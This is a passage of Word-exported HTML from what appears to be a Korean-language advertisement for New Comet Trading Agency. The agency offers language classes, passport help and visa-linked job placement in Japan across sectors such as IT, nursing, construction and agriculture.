Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본어</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">,</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영어 수업들을 교육 시킴</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 해외</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">방문에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(PJ)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">없는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">여권</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><p><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본으로 연수비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">도쿠테이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기노 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Tokutei Ginou) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자로 취업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">희망하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">분들 위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">전통문화와</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">풍속을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">익히도록 필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">코스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육 시키고 취직을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span></p><p><o:p></o:p></p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">&nbsp; &nbsp; 일본어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> N3, N2(JLPT, JFT, NAT-Test, Top J)&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격하는 분들이</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Work Visa </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">인</span><o:p></o:p></li></ol><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">번역</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; • IT&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">엔지니어링</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Civil</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">Mechanical</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">, EP, EC, Auto CAD&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">)</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">간호지원</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업으로 일본으로 가고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싶다면</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해당</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">학당으로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연결</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp;New Comet Trading Agency</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다음</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업체를 훈련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비자&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(Training Visa)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로 가고 싶은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자매를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비 &nbsp; &nbsp; 스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">주선하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자동차</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수리</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관련</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">집</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">짓기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">식품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌀</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">공장</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">매장</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운영</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">호텔</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">비즈니스</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">의류</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">농업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직업</span><o:p></o:p></p><p class=\"MsoListParagraphCxSpMiddle\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp; &nbsp; &nbsp; •&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">물</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제품</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 